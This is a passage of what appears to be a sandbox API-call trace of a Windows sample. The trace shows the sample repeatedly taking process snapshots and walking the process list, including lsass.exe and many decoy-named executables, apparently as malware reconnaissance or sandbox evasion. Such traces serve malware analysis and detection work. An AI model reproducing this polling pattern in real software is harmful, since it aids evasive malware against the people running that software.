pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0131.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0131.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0131.600] CloseHandle (hObject=0xbc) returned 1 [0131.600] Sleep (dwMilliseconds=0x12c) [0132.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0132.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0132.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0132.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0132.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.183] CloseHandle (hObject=0xc4) returned 1 [0132.183] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.189] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0132.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.197] 
